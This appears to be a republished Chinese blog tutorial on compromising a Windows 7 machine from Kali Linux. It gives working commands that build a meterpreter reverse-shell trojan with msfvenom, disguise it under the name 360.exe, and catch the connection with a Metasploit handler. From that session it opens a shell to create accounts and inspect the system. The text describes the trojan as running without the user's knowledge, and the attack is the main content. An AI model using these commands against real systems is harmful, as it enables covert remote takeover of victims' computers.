kali之入侵Win7系统1

简介:

木马程序:当执行这个程序时,隐藏的恶意程序在用户不知情的情况下也会执行,在内存中运行

写木马文件,并赋予权限

root@kali:~#msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.48.123 lport=33389 -f exe > 360.exe
root@kali:~#chmod 777 360.exe 


配置网络信息

开启PostgreSQL:  service postgresql start
开启metasploit:  service metasploit start

root@kali:~# msfconsole

wKioL1lTpDDwGgAEAAMAwVaZ7zY515.jpg

msf > use exploit/multi/handler
msf exploit(handler) > set lhost 192.168.48.123
msf exploit(handler) > set lport 33389
 msf exploit(handler) > exploit -z -j
msf exploit(handler) > sessions
msf exploit(handler) > sessions -i 1

wKiom1lTo0bzonhoAANqorV7BSI698.jpg

meterpreter > shell 进入shell里可以在此处创建账户密码

wKioL1lTo4zxUe84AAKq_XlivrU552.jpg

查看系统信息,用户权限

wKiom1lTpNWjO3HiAAHUH6_6sqc100.jpg


wKioL1lVoZLQnTcyAAM7hxopnrk336.jpg










本文转自 周小玉 51CTO博客,原文链接:http://blog.51cto.com/maguangjie/1942846,如需转载请自行联系原作者
目录
相关文章
|
1月前
|
Java 网络安全 Windows
Kali渗透测试:使用 Armitage生成被控端和主控端
Kali渗透测试:使用 Armitage生成被控端和主控端
|
1月前
|
安全 Linux 网络安全
Kali渗透测试:使用工具Metasploit攻击操作系统(二)
Kali渗透测试:使用工具Metasploit攻击操作系统(二)
|
1月前
|
安全 网络安全 数据库
Kali渗透测试:使用工具Metasploit攻击操作系统(一)
Kali渗透测试:使用工具Metasploit攻击操作系统(一)
|
安全 Windows
Windows2003系统漏洞提权复现
操作系统: Microsoft Windows Server 2003 Web服务器: IIS V6.0 第一步,将大马文件上传至服务器根目录
555 0
Windows2003系统漏洞提权复现
|
安全 网络安全 Windows
渗透测试-Windows远程桌面服务漏洞(CVE-2019-0708)
渗透测试-Windows远程桌面服务漏洞(CVE-2019-0708)
渗透测试-Windows远程桌面服务漏洞(CVE-2019-0708)
|
Windows
kali下Eternalblue攻击win7
版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396602 ...
881 0
|
Windows
kali:用TheFatRat攻击win10
版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396406 ...
1224 0